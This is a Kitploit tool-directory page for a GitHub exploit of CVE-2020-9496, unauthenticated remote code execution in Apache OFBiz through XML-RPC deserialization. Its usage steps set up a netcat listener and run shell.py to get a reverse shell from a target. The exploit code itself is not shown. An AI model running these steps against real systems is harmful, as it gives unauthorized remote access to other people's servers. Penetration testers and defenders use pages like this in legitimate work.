Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-9496 — ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión | Kitploit
Tools/GitHubGitHub/ly0nt4r/cve-2020-9496
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubly0nt4r/cve-2020-9496

CVE-2020-9496

ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión

View Repository
23 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-9496

ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión

XML-RPC request are vulnerable to unsafe deserialization.

Steps

Step 1:

pip3 install -r requeriments.txt

Step 2:

nc -nlvp <port> # attack computer

Step 3:

python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>

Step 4:

You should have a shell in your nc listener

shell

Download Tool